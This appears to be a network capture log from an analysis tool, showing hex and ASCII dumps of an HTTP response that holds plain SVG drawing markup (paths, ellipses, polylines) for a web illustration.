                                                                                                                                                                                                                                                                          2023-07-05 06:07:35 UTC3606INData Raw: 63 79 3d 22 32 33 33 2e 36 37 22 20 72 78 3d 22 30 2e 31 37 22 20 72 79 3d 22 30 2e 32 32 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 32 38 2e 37 38 20 35 35 30 2e 37 36 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 3e 3c 2f 65 6c 6c 69 70 73 65 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 63 78 3d 22 38 31 32 2e 39 38 22 20 63 79 3d 22 32 33 34 2e 30 39 22 20 72 78 3d 22 30 2e 31 37 22 20 72 79 3d 22 30 2e 32 32 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 32 38 2e 36 33 20 35 35 31 2e 31 35 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 3e 3c 2f 65 6c 6c 69 70 73 65 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 63 78 3d 22 38 31 33 2e 34
                                                                                                                                                                                                                                                                          Data Ascii: cy="233.67" rx="0.17" ry="0.22" transform="translate(28.78 550.76) rotate(-38.07)"></ellipse><ellipse class="cls-38" cx="812.98" cy="234.09" rx="0.17" ry="0.22" transform="translate(28.63 551.15) rotate(-38.07)"></ellipse><ellipse class="cls-38" cx="813.4
                                                                                                                                                                                                                                                                          2023-07-05 06:07:35 UTC3622INData Raw: 73 20 31 20 6e 6f 72 6d 61 6c 20 6e 6f 6e 65 20 72 75 6e 6e 69 6e 67 3b 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 20 73 76 67 2d 61 6e 69 6d 22 20 64 3d 22 4d 38 30 38 2e 38 35 2c 32 38 31 2e 37 37 61 31 2e 38 35 2c 31 2e 38 35 2c 30 2c 30 2c 31 2c 2e 31 31 2d 2e 33 31 63 2d 2e 33 31 2e 36 37 2d 31 2c 31 2d 31 2e 30 39 2c 31 2e 37 38 61 31 31 2c 31 31 2c 30 2c 30 2c 30 2d 2e 31 35 2c 31 2e 31 35 63 30 2c 2e 34 34 2e 32 2e 36 32 2e 33 31 2c 31 2c 2e 32 32 2e 37 34 2d 2e 31 37 2c 31 2e 37 35 2d 31 2e 30 37 2c 31 2e 34 35 2d 2e 36 39 2d 2e 32 33 2d 31 2e 31 2d 31 2d 31 2e 36 2d 31 2e 34 35 61 31 31 2e 37 36 2c 31 31 2e 37 36 2c 30 2c 30 2c 31 2d 31 2e 38 39 2d 31 2e 37 37 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c
                                                                                                                                                                                                                                                                          Data Ascii: s 1 normal none running;"></path><path class="cls-38 svg-anim" d="M808.85,281.77a1.85,1.85,0,0,1,.11-.31c-.31.67-1,1-1.09,1.78a11,11,0,0,0-.15,1.15c0,.44.2.62.31,1,.22.74-.17,1.75-1.07,1.45-.69-.23-1.1-1-1.6-1.45a11.76,11.76,0,0,1-1.89-1.77,2.39,2.39,0,0,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:35 UTC3638INData Raw: 35 2e 36 36 20 35 39 38 2e 34 35 20 32 32 31 2e 37 22 3e 3c 2f 70 6f 6c 79 6c 69 6e 65 3e 3c 70 6f 6c 79 6c 69 6e 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 35 32 22 20 70 6f 69 6e 74 73 3d 22 35 37 39 2e 35 34 20 32 31 31 2e 31 32 20 35 39 32 2e 36 35 20 32 31 36 2e 32 33 20 35 39 39 2e 32 20 32 32 30 2e 32 22 3e 3c 2f 70 6f 6c 79 6c 69 6e 65 3e 3c 70 6f 6c 79 6c 69 6e 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 35 32 22 20 70 6f 69 6e 74 73 3d 22 35 37 37 2e 38 32 20 32 33 35 2e 32 32 20 35 39 30 2e 35 20 32 33 39 2e 35 34 20 35 39 37 2e 38 31 20 32 33 36 2e 33 37 22 3e 3c 2f 70 6f 6c 79 6c 69 6e 65 3e 3c 70 6f 6c 79 6c 69 6e 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 35 33 22 20 70 6f 69 6e 74 73 3d 22 35 37 37 2e 38 32 20 32 35 30 2e 33 31 20 35 39 30 2e 35 20 32
                                                                                                                                                                                                                                                                          Data Ascii: 5.66 598.45 221.7"></polyline><polyline class="cls-52" points="579.54 211.12 592.65 216.23 599.2 220.2"></polyline><polyline class="cls-52" points="577.82 235.22 590.5 239.54 597.81 236.37"></polyline><polyline class="cls-53" points="577.82 250.31 590.5 2
                                                                                                                                                                                                                                                                          2023-07-05 06:07:35 UTC3654INData Raw: 61 6e 69 6d 22 20 64 3d 22 4d 36 30 39 2e 33 33 2c 33 30 34 2e 38 39 61 31 2e 36 32 2c 31 2e 36 32 2c 30 2c 30 2c 30 2c 2e 32 2d 2e 32 38 63 2d 2e 34 2e 36 37 2d 2e 33 31 2c 31 2e 34 38 2d 2e 39 2c 32 61 39 2e 39 34 2c 39 2e 39 34 2c 30 2c 30 2c 31 2d 2e 39 32 2e 38 63 2d 2e 33 38 2e 32 37 2d 2e 36 35 2e 32 2d 31 2c 2e 33 33 2d 2e 37 38 2e 32 35 2d 31 2e 34 33 2c 31 2e 31 37 2d 2e 36 34 2c 31 2e 37 38 61 35 2e 31 38 2c 35 2e 31 38 2c 30 2c 30 2c 30 2c 32 2e 32 31 2e 35 34 2c 31 32 2e 31 31 2c 31 32 2e 31 31 2c 30 2c 30 2c 30 2c 32 2e 36 35 2e 36 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 30 2c 31 2e 34 35 2d 2e 35 35 63 2e 34 35 2d 2e 34 38 2e 32 38 2d 31 2e 35 37 2e 32 34 2d 32 2e 31 36 2d 2e 30 36 2d 31 2d 2e 34 33 2d 31 2e 39 32 2d 2e 34 31 2d 32 2e
                                                                                                                                                                                                                                                                          Data Ascii: anim" d="M609.33,304.89a1.62,1.62,0,0,0,.2-.28c-.4.67-.31,1.48-.9,2a9.94,9.94,0,0,1-.92.8c-.38.27-.65.2-1,.33-.78.25-1.43,1.17-.64,1.78a5.18,5.18,0,0,0,2.21.54,12.11,12.11,0,0,0,2.65.6,2.52,2.52,0,0,0,1.45-.55c.45-.48.28-1.57.24-2.16-.06-1-.43-1.92-.41-2.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:35 UTC3670INData Raw: 30 2c 30 2d 2e 35 32 2d 2e 30 36 2c 31 2e 35 34 2c 31 2e 35 34 2c 30 2c 30 2c 30 2d 2e 37 2e 31 35 2c 31 2e 34 33 2c 31 2e 34 33 2c 30 2c 30 2c 30 2d 2e 35 2e 34 31 2c 31 2e 37 37 2c 31 2e 37 37 2c 30 2c 30 2c 30 2d 2e 33 2e 35 38 2c 32 2e 36 31 2c 32 2e 36 31 2c 30 2c 30 2c 30 2d 2e 30 39 2e 36 39 76 33 68 2d 31 2e 31 33 56 37 31 2e 31 36 43 38 39 34 2e 34 39 2c 37 31 2c 38 39 34 2e 34 39 2c 37 30 2e 38 31 2c 38 39 34 2e 34 38 2c 37 30 2e 35 37 5a 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 32 22 20 64 3d 22 4d 39 30 30 2e 31 35 2c 36 37 2e 38 38 61 2e 36 37 2e 36 37 2c 30 2c 30 2c 31 2d 2e 32 32 2e 35 32 2e 37 32 2e 37 32 2c 30 2c 30 2c 31 2d 2e 35 33 2e 32 2e 36 38 2e 36 38 2c 30 2c 30 2c 31 2d 2e 35 32 2d 2e 32 31 2e
                                                                                                                                                                                                                                                                          Data Ascii: 0,0-.52-.06,1.54,1.54,0,0,0-.7.15,1.43,1.43,0,0,0-.5.41,1.77,1.77,0,0,0-.3.58,2.61,2.61,0,0,0-.09.69v3h-1.13V71.16C894.49,71,894.49,70.81,894.48,70.57Z"></path><path class="cls-2" d="M900.15,67.88a.67.67,0,0,1-.22.52.72.72,0,0,1-.53.2.68.68,0,0,1-.52-.21.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:35 UTC3686INData Raw: 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 30 30 2e 31 31 2c 32 30 31 2e 37 32 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 41 32 2e 35 33 2c 32 2e 35 33 2c 30 2c 30 2c 31 2c 36 39 36 2c 32 30 33 61 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d
                                                                                                                                                                                                                                                                          Data Ascii: 51-2.89,2.25,2.25,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.86"></path><path class="cls-4" d="M700.11,201.72a1.73,1.73,0,0,1-.78,2.24A2.53,2.53,0,0,1,696,203a2.42,2.42,0,0,1,.51-2.89,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.85"></path><path class="cls-4" d="M
                                                                                                                                                                                                                                                                          2023-07-05 06:07:35 UTC3702INData Raw: 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 33 31 2e 35 37 2c 32 39 37 2e 38 34 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2c 2e 35 32 2d 32 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 33 31 2e 33 34 2c 32 39 30 2e 39 31 61 31 2e 37
                                                                                                                                                                                                                                                                          Data Ascii: 0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"></path><path class="cls-4" d="M731.57,297.84a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.39,2.39,0,0,1,.52-2.88,2.24,2.24,0,0,1,2.89,0,2.12,2.12,0,0,1,.16,2.86"></path><path class="cls-4" d="M731.34,290.91a1.7
                                                                                                                                                                                                                                                                          2023-07-05 06:07:35 UTC3718INData Raw: 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 34 39 2e 34 32 2c 32 30 30 2e 30 36 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 34 39 2e 31 39 2c 31 39 33 2e 31 32 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d
                                                                                                                                                                                                                                                                          Data Ascii: th><path class="cls-4" d="M749.42,200.06a1.72,1.72,0,0,1-.78,2.23,2.52,2.52,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.11,2.11,0,0,1,.16,2.85"></path><path class="cls-4" d="M749.19,193.12a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-
                                                                                                                                                                                                                                                                          2023-07-05 06:07:35 UTC3734INData Raw: 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2d 33 2e 33 33 2d 2e 39 34 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 38 30 2e 36 35 2c 32 38 39 2e 32 34 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32
                                                                                                                                                                                                                                                                          Data Ascii: ,1.72,0,0,1-.78,2.23,2.5,2.5,0,0,1-3.33-.94,2.37,2.37,0,0,1,.51-2.88,2.24,2.24,0,0,1,2.89,0,2.12,2.12,0,0,1,.16,2.86"></path><path class="cls-4" d="M780.65,289.24a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2
                                                                                                                                                                                                                                                                          2023-07-05 06:07:35 UTC3750INData Raw: 2e 33 34 2d 2e 39 34 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 32 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 39 38 2e 35 2c 31 39 31 2e 34 35 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68
                                                                                                                                                                                                                                                                          Data Ascii: .34-.94,2.41,2.41,0,0,1,.52-2.89,2.25,2.25,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.85"></path><path class="cls-4" d="M798.5,191.45a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"></path
                                                                                                                                                                                                                                                                          2023-07-05 06:07:35 UTC3766INData Raw: 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 33 30 2c 32 38 37 2e 35 37 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 33 2c 32 2e 31 33 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 32 39 2e 37 32 2c 32 38 30 2e 36 33 61 31 2e 37 32 2c 31 2e 37
                                                                                                                                                                                                                                                                          Data Ascii: 0,1,2.89,0,2.11,2.11,0,0,1,.16,2.86"></path><path class="cls-4" d="M830,287.57a1.72,1.72,0,0,1-.78,2.23,2.52,2.52,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.13,2.13,0,0,1,.16,2.86"></path><path class="cls-4" d="M829.72,280.63a1.72,1.7
                                                                                                                                                                                                                                                                          2023-07-05 06:07:35 UTC3782INData Raw: 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 34 37 2e 38 31 2c 31 38 39 2e 37 39 41 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2c 38 34 37 2c 31 39 32 61 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 35 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 34 37 2e 35 37 2c 31 38 32 2e 38 35 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 31
                                                                                                                                                                                                                                                                          Data Ascii: 0,1,.16,2.86"></path><path class="cls-4" d="M847.81,189.79A1.72,1.72,0,0,1,847,192a2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.25,2.25,0,0,1,2.9,0,2.11,2.11,0,0,1,.15,2.85"></path><path class="cls-4" d="M847.57,182.85a1.73,1.73,0,0,1-.78,2.24,2.51
                                                                                                                                                                                                                                                                          2023-07-05 06:07:35 UTC3798INData Raw: 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 39 2e 32 37 2c 32 38 35 2e 39 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 33 2c 32 2e 31 33 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 39 2c 32 37 39 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35
                                                                                                                                                                                                                                                                          Data Ascii: s="cls-4" d="M879.27,285.9a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.13,2.13,0,0,1,.16,2.86"></path><path class="cls-4" d="M879,279a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.5
                                                                                                                                                                                                                                                                          2023-07-05 06:07:35 UTC3814INData Raw: 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 39 36 2e 38 38 2c 31 38 31 2e 31 38 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 33 2d 2e 39 34 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30
                                                                                                                                                                                                                                                                          Data Ascii: 0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.85"></path><path class="cls-4" d="M896.88,181.18a1.72,1.72,0,0,1-.78,2.24,2.51,2.51,0,0,1-3.33-.94,2.39,2.39,0,0,1,.51-2.89,2.24,2.24,0,0,1,2.89,0
                                                                                                                                                                                                                                                                          2023-07-05 06:07:35 UTC3830INData Raw: 2d 33 2e 33 34 2d 31 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 38 2e 33 35 2c 32 37 37 2e 33 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 35 22 3e 3c 2f 70 61 74 68 3e 3c 70
                                                                                                                                                                                                                                                                          Data Ascii: -3.34-1,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.86"></path><path class="cls-4" d="M928.35,277.3a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,0,2.11,2.11,0,0,1,.15,2.85"></path><p
                                                                                                                                                                                                                                                                          2023-07-05 06:07:35 UTC3846INData Raw: 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 33 38 2e 32 31 2c 32 39 33 2e 32 34 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 33 38 2e 34 34 2c 33 30 30 2e 30 37 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37
                                                                                                                                                                                                                                                                          Data Ascii: 0,0,1-.16-2.82"></path><path class="cls-4" d="M1038.21,293.24a1.69,1.69,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.82"></path><path class="cls-4" d="M1038.44,300.07a1.7,1.7,0,0,1,.77-2.2,2.47
                                                                                                                                                                                                                                                                          2023-07-05 06:07:35 UTC3862INData Raw: 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 30 37 2e 34 35 2c 32 30 35 2e 34 31 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 30 37 2e 36 39 2c 32 31 32 2e 32 34 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d
                                                                                                                                                                                                                                                                          Data Ascii: cls-4" d="M1007.45,205.41a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"></path><path class="cls-4" d="M1007.69,212.24a1.69,1.69,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-
